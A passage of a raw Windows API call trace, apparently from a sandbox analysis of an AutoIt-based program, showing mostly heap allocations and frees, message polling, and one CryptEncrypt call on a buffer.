(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0228.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7130) returned 0x2f22a78 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0228.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0228.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0228.594] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0228.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x2f29bb0 [0228.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x2f30ce0 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29bb0 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30ce0 | out: hHeap=0x970000) returned 1 [0228.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0228.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0228.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0228.597] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0228.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0228.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0228.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0228.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0228.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7128) returned 0x2f29bb0 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29bb0 | out: hHeap=0x970000) returned 1 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0228.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3bf7f08 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0228.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0228.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0228.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0228.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0228.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e512e0 [0228.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0228.602] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f22a78*, pdwDataLen=0x8cef60*=0x7128, dwBufLen=0x7130 | out: pbData=0x2f22a78*, pdwDataLen=0x8cef60*=0x7130) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0228.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0228.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0228.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0228.665] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0228.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0228.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0228.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0228.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0228.666] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0228.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0228.666] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0228.666] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0228.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 